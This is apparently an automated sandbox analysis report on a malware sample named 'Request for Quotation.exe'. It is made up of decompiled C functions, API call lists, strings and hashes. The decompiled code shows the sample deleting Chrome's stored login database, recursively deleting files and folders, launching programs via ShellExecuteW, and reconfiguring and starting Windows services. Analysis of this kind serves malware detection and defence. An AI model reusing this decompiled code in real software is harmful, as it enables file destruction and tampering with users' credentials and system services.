                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,00000000), ref: 0040D5A2
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,?,00000000), ref: 0040D5B3
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000), ref: 0040D5C0
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D5DD
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040D60E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D625
                                                                                • free.MSVCRT(?,C:\Users\user\Desktop\Request for Quotation.exe,?), ref: 0040D643
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                  • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                                                                  • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                                                                  • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                                                                  • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                                                                  • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                                                                Strings
                                                                                • open, xrefs: 0040D5BA
                                                                                • C:\Users\user\Desktop\Request for Quotation.exe, xrefs: 0040D636
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@std@@$??1?$basic_string@$D@2@@std@@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V?$basic_string@$??2@??3@?length@?$basic_string@DownloadExecuteFileShellV01@@free
                                                                                • String ID: C:\Users\user\Desktop\Request for Quotation.exe$open
                                                                                • API String ID: 2294739476-3163107129
                                                                                • Opcode ID: 116c612a25176188bdba456355ef9aa21b96b1dc395a3104552b31ad9d06bf76
                                                                                • Instruction ID: 66a65e8c2e1efbdbe9726922674a8fee4e6f9857a913e182205edf5cab11bea9
                                                                                • Opcode Fuzzy Hash: 116c612a25176188bdba456355ef9aa21b96b1dc395a3104552b31ad9d06bf76
                                                                                • Instruction Fuzzy Hash: BE416C7290011CABCB05ABE0EC999EE7778BB54355F44487AF912F30E1EE785A44CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00410145, Relevance: 31.7, APIs: 21, Instructions: 177COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410153
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6D195DF0), ref: 0041016E
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0041017F
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000001), ref: 0041018F
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 0041019F
                                                                                • StrToIntA.SHLWAPI(00000000), ref: 004101A6
                                                                                  • Part of subcall function 0040F5F4: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                                                                  • Part of subcall function 0040F5F4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                                                                  • Part of subcall function 0040F5F4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004101CC
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 004101DA
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000003), ref: 004101ED
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000004), ref: 00410200
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410347
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410350
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??1?$basic_string@$??0?$basic_string@?size@?$basic_string@?substr@?$basic_string@V01@@V12@
                                                                                • String ID:
                                                                                • API String ID: 1196022968-0
                                                                                • Opcode ID: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                                                                • Instruction ID: 7272514a8ba1597b194ef94dbad827cdd9e8fa084c1de8a91cbb274806fefa0c
                                                                                • Opcode Fuzzy Hash: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                                                                • Instruction Fuzzy Hash: C9614976840208EFCF01DFE4DC88AED7B75BB19300F0081A6E516A72B1DB785A99CF19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403325, Relevance: 27.1, APIs: 18, Instructions: 109fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00000000), ref: 0040333B
                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00403342
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000), ref: 00403379
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898,?,?,00000000), ref: 00403392
                                                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,?,?,00000000), ref: 00403399
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 004033A6
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004033C4
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004033CE
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004033D7
                                                                                • FindNextFileW.KERNEL32(?,?), ref: 004033ED
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00403402
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00403411
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040341D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403426
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040342F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040344A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000050), ref: 0040345F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403468
                                                                                  • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                                                                  • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                                                                  • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@G@std@@$G@2@@std@@$D@1@@V01@@$??4?$basic_string@?c_str@?$basic_string@FileFindV01@V?$basic_string@$??9std@@?length@?$basic_string@D@2@@0@FirstG@1@@G@2@@0@Hstd@@NextV10@0@
                                                                                • String ID:
                                                                                • API String ID: 3638635289-0
                                                                                • Opcode ID: 50729e0f487a675d406b375c381a7b1e4c46741dfe175a948957291c48c150db
                                                                                • Instruction ID: 5773dbc557d9876992c7e48c4d97bf12bb9d98964626974f027bca1071927927
                                                                                • Opcode Fuzzy Hash: 50729e0f487a675d406b375c381a7b1e4c46741dfe175a948957291c48c150db
                                                                                • Instruction Fuzzy Hash: E641FB7290050DEBCB04ABA0DC49DEEBB7CEB94355F404166F512E30A0EF745689CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040710F, Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 65fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 32%
                                                                                			E0040710F() {
				char _v5;
				char _v6;
				char _v24;
				void* _v40;
				char* _t12;
				CHAR* _t13;
				long _t20;
				char* _t21;
				void* _t25;

				_t12 = getenv("UserProfile");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				_t13 =  &_v24;
				L00414170();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				if(DeleteFileA(_t13) != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
					E00407A90("\n[Chrome StoredLogins found, cleared!]");
					_t25 = 1;
					L8:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t25;
				}
				_t20 = GetLastError();
				if(_t20 == 0) {
					_t21 =  &_v6;
					L5:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
					E00407A90("\n[Chrome StoredLogins not found]");
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 1;
				}
				if(_t20 == 1) {
					_t21 =  &_v5;
					goto L5;
				}
				_t25 = 0;
				goto L8;
			}












                                                                                0x00407124
                                                                                0x0040712f
                                                                                0x00407136
                                                                                0x0040713a
                                                                                0x00407145
                                                                                0x0040714e
                                                                                0x0040715d
                                                                                0x004071b1
                                                                                0x004071b7
                                                                                0x004071bf
                                                                                0x004071c1
                                                                                0x004071c4
                                                                                0x00000000
                                                                                0x004071ca
                                                                                0x00407166
                                                                                0x00407167
                                                                                0x0040719c
                                                                                0x00407178
                                                                                0x0040717e
                                                                                0x00407184
                                                                                0x0040718f
                                                                                0x00000000
                                                                                0x00407195
                                                                                0x0040716a
                                                                                0x00407173
                                                                                0x00000000
                                                                                0x00407176
                                                                                0x0040716c
                                                                                0x00000000

                                                                                APIs
                                                                                • getenv.MSVCRT ref: 00407124
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040712F
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040713A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407145
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040714E
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00407155
                                                                                • GetLastError.KERNEL32 ref: 0040715F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],00000000), ref: 0040717E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040718F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],00000000), ref: 004071B1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071C4
                                                                                Strings
                                                                                • [Chrome StoredLogins not found], xrefs: 00407179
                                                                                • UserProfile, xrefs: 0040711F
                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00407119
                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 004071AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                • API String ID: 3740952235-1062637481
                                                                                • Opcode ID: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                                                                • Instruction ID: 31ca8e98cb087ed4ee3b22d3c36486bbccf77f9584d8598ce9e7038f5dc1f740
                                                                                • Opcode Fuzzy Hash: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                                                                • Instruction Fuzzy Hash: 51118475904509EBCB00BBE0ED4E9FE7738DA547417504036E812E32E1EA796A45CBAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00412BEE, Relevance: 24.1, APIs: 16, Instructions: 111fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00412BEE(wchar_t* _a4) {
				signed char _v5;
				void* _v12;
				short _v532;
				long _v1052;
				struct _WIN32_FIND_DATAW _v1644;
				void* _t46;

				wcscpy( &_v1052, _a4);
				wcscat( &_v1052, L"\\*");
				wcscpy( &_v532, _a4);
				wcscat( &_v532, "\\");
				_t46 = FindFirstFileW( &_v1052,  &_v1644);
				_v12 = _t46;
				if(_t46 == 0xffffffff) {
					L18:
					return 0;
				}
				wcscpy( &_v1052,  &_v532);
				_v5 = 1;
				do {
					if(FindNextFileW(_v12,  &_v1644) == 0) {
						if(GetLastError() != 0x12) {
							L17:
							FindClose(_v12);
							goto L18;
						}
						_v5 = _v5 & 0x00000000;
						goto L14;
					}
					if(E00412BBA( &(_v1644.cFileName)) != 0) {
						goto L14;
					}
					wcscat( &_v532,  &(_v1644.cFileName));
					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v532, 0x80);
						}
						if(DeleteFileW( &_v532) == 0) {
							goto L17;
						} else {
							L7:
							wcscpy( &_v532,  &_v1052);
							goto L14;
						}
					}
					if(E00412BEE( &_v532) == 0) {
						goto L17;
					}
					RemoveDirectoryW( &_v532);
					goto L7;
					L14:
				} while (_v5 != 0);
				FindClose(_v12);
				return RemoveDirectoryW(_a4);
			}









                                                                                0x00412c0a
                                                                                0x00412c1e
                                                                                0x00412c2a
                                                                                0x00412c38
                                                                                0x00412c4b
                                                                                0x00412c54
                                                                                0x00412c57
                                                                                0x00412d52
                                                                                0x00000000
                                                                                0x00412d52
                                                                                0x00412c6b
                                                                                0x00412c75
                                                                                0x00412c79
                                                                                0x00412c8b
                                                                                0x00412d26
                                                                                0x00412d49
                                                                                0x00412d4c
                                                                                0x00000000
                                                                                0x00412d4c
                                                                                0x00412d28
                                                                                0x00000000
                                                                                0x00412d28
                                                                                0x00412ca0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00412cb4
                                                                                0x00412cbf
                                                                                0x00412cf6
                                                                                0x00412d04
                                                                                0x00412d04
                                                                                0x00412d19
                                                                                0x00000000
                                                                                0x00412d1b
                                                                                0x00412cdb
                                                                                0x00412ce9
                                                                                0x00000000
                                                                                0x00412cec
                                                                                0x00412d19
                                                                                0x00412cd0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00412cd9
                                                                                0x00000000
                                                                                0x00412d2c
                                                                                0x00412d2c
                                                                                0x00412d39
                                                                                0x00000000

                                                                                APIs
                                                                                • wcscpy.MSVCRT ref: 00412C0A
                                                                                • wcscat.MSVCRT ref: 00412C1E
                                                                                • wcscpy.MSVCRT ref: 00412C2A
                                                                                • wcscat.MSVCRT ref: 00412C38
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                                                                • wcscpy.MSVCRT ref: 00412C6B
                                                                                • FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                                                                • wcscat.MSVCRT ref: 00412CB4
                                                                                • wcscpy.MSVCRT ref: 00412CE9
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00412D04
                                                                                • DeleteFileW.KERNEL32(?), ref: 00412D11
                                                                                  • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                                                                • GetLastError.KERNEL32 ref: 00412D1D
                                                                                • FindClose.KERNEL32(004085F5), ref: 00412D39
                                                                                • RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                                                                • FindClose.KERNEL32(004085F5), ref: 00412D4C
                                                                                  • Part of subcall function 00412BBA: wcscmp.MSVCRT ref: 00412BCC
                                                                                  • Part of subcall function 00412BBA: wcscmp.MSVCRT ref: 00412BDC
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindwcscpy$wcscat$CloseDirectoryRemovewcscmp$AttributesDeleteErrorFirstLastNext
                                                                                • String ID:
                                                                                • API String ID: 520940213-0
                                                                                • Opcode ID: 478ef376a42dd57bdfe1c9928a2704afada4e3ce62e72bb6f7890d5e37a58212
                                                                                • Instruction ID: fb5d4b3d5d58ecc2c3d6dfc175ce5965a41efe56bc0731aa74bc7a01e785bf8c
                                                                                • Opcode Fuzzy Hash: 478ef376a42dd57bdfe1c9928a2704afada4e3ce62e72bb6f7890d5e37a58212
                                                                                • Instruction Fuzzy Hash: BE415E72C0421CAADF21DBA0DD88FDE7BBDAF44304F1445A6E504E2050EBB59AD5CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00411927, Relevance: 12.1, APIs: 8, Instructions: 64serviceCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 48%
                                                                                			E00411927(void* _a4, signed char _a20) {
				short* _t6;
				signed int _t9;
				void* _t14;
				short* _t17;
				int _t19;
				void* _t21;
				void* _t22;

				_t17 = 0;
				_t6 = OpenSCManagerW(0, 0, 2);
				_t22 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t21 = OpenServiceW(_t22, _t6, 2);
				if(_t21 != 0) {
					_t19 =  &_a4 | 0xffffffff;
					_t9 = _a20 & 0x000000ff;
					if(_t9 == 0) {
						_push(4);
						goto L8;
					} else {
						_t14 = _t9 - 1;
						if(_t14 == 0) {
							_push(2);
							goto L8;
						} else {
							if(_t14 == 1) {
								_push(3);
								L8:
								_pop(_t19);
							}
						}
					}
					_t17 = _t17 & 0xffffff00 | ChangeServiceConfigW(_t21, 0xffffffff, _t19, 0xffffffff, _t17, _t17, _t17, _t17, _t17, _t17, _t17) != 0x00000000;
					CloseServiceHandle(_t22);
					CloseServiceHandle(_t21);
				} else {
					CloseServiceHandle(_t22);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t17;
			}










                                                                                0x0041192d
                                                                                0x00411933
                                                                                0x0041193e
                                                                                0x00411940
                                                                                0x0041194e
                                                                                0x00411952
                                                                                0x00411961
                                                                                0x00411964
                                                                                0x00411966
                                                                                0x00411976
                                                                                0x00000000
                                                                                0x00411968
                                                                                0x00411968
                                                                                0x00411969
                                                                                0x00411972
                                                                                0x00000000
                                                                                0x0041196b
                                                                                0x0041196c
                                                                                0x0041196e
                                                                                0x00411978
                                                                                0x00411978
                                                                                0x00411978
                                                                                0x0041196c
                                                                                0x00411969
                                                                                0x00411995
                                                                                0x00411998
                                                                                0x0041199b
                                                                                0x00411954
                                                                                0x00411955
                                                                                0x00411955
                                                                                0x004119a0
                                                                                0x004119ac

                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,Function_0001B310,?,?,00410FD9), ref: 00411933
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00410FD9), ref: 00411986
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411998
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 0041199B
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ChangeConfigManager
                                                                                • String ID:
                                                                                • API String ID: 760094045-0
                                                                                • Opcode ID: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                                                                • Instruction ID: c2fa0ded83cb97236bb08be5de2499f982cdcb79c4471a71361dcbc3e7912862
                                                                                • Opcode Fuzzy Hash: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                                                                • Instruction Fuzzy Hash: 2201D2B1120528BAE6001B709C99EFB3F5CEF453B0B044226F632961E0CA644D81C9E9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00411700, Relevance: 12.0, APIs: 8, Instructions: 42serviceCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E00411700(void* _a4) {
				short* _t5;
				signed int _t12;
				void* _t15;
				void* _t16;

				_t12 = 0;
				_t5 = OpenSCManagerW(0, 0, 0x10);
				_t16 = _t5;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t15 = OpenServiceW(_t16, _t5, 0x10);
				if(_t15 != 0) {
					_t12 = 0 | StartServiceW(_t15, 0, 0) != 0x00000000;
					CloseServiceHandle(_t16);
					CloseServiceHandle(_t15);
				} else {
					CloseServiceHandle(_t16);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t12;
			}







                                                                                0x00411706
                                                                                0x0041170c
                                                                                0x00411717
                                                                                0x00411719
                                                                                0x00411727
                                                                                0x0041172b
                                                                                0x00411748
                                                                                0x0041174b
                                                                                0x0041174e
                                                                                0x0041172d
                                                                                0x0041172e
                                                                                0x0041172e
                                                                                0x00411753
                                                                                0x0041175f

                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,Function_0001B310,?,?,0041130D), ref: 0041170C
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000010,?,?,0041130D), ref: 00411719
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,0041130D), ref: 00411721
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041172E
                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041130D), ref: 00411739
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041174B
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041174E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041130D), ref: 00411753
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
